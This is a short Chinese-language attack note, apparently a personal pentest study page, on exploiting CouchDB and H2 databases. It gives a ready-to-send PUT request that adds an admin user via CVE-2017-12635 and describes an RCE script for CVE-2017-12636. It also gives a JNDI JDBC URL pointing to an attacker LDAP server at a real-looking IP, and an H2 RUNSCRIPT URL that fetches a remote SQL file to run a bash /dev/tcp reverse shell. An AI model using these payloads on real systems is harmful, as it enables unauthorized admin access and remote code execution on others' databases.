服务攻防:数据库安全

outman
4
2025-07-24

Redis

couchdb :5984

Apache CouchDB是一个开源数据库,专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式,JavaScript作为查询语言

权限绕过(CVE-2017-12635)

/_utils/:登陆后台

PUT 请求方法 发送数据包 可以添加一个 admin 用户 cc

PUT /_users/org.couchdb.user:cc

{

"type":"user",

"name":"cc",

"roles":["_admin"],

"roles": [],

"password":"cc"

}

任意命令执行(CVE-2017-12636)

云上 vps 开启监听端口

修改 couchdb.py 脚本

target:目标网站

command:vps ip:ports

本机 python 执行脚本即可

couchdb.py

H2 :20051

Java SQL 数据库 H2,H2的主要特点是:非常快,开源

JNDI RCE(CVE-2021-42392)

java-chain 开启 jndi-control,选择反序列化链,生成 jndi

数据库连接处:

Driver Class:javax.naming.InitialContext

JDBC URL:ldap://62.234.24.115:50389/d7a955(java-chain生成)

JDBC RCE(CVE-2022-23221)

1.未授权进入数据库:jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\

2.反弹shell:

创建数据库文件 h2.sql

echo,后面指令部分修改: bash -i >& /dev/tcp/x.x.x.x/5566 0>&1(base64加密)

文件保存在 vps 上,python3 -m http.server 端口

数据库连接处:jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://vps:port/h2.sql';\

vps 开启监听,实现反弹

h2.sql